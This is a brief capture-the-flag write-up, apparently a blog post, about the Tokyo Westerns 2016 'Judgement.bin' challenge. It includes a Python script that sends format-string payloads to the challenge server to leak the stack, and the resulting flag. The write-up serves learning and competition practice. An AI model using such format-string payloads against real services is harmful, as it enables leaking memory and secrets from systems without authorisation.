Tokyo Westerns 2016 was this past weekend and one of the challenges Judgement.bin had you connect to a remote listener and send it something. It was vuln to string format so we could leak the stack. Printing the stack:
#!/usr/bin/env python
import socket
for i in range(50):
csock = socket.socket()
csock.connect(('pwn1.chal.ctf.westerns.tokyo', 31729))
csock.send("%{}$s\n".format(i))
x = csock.recv(1024)
if 'TWCTF' in x:
print(x)
break
After a bit, we are rewarded with Input flag >> TWCTF{R3:l1f3_1n_4_pwn_w0rld_fr0m_z3r0}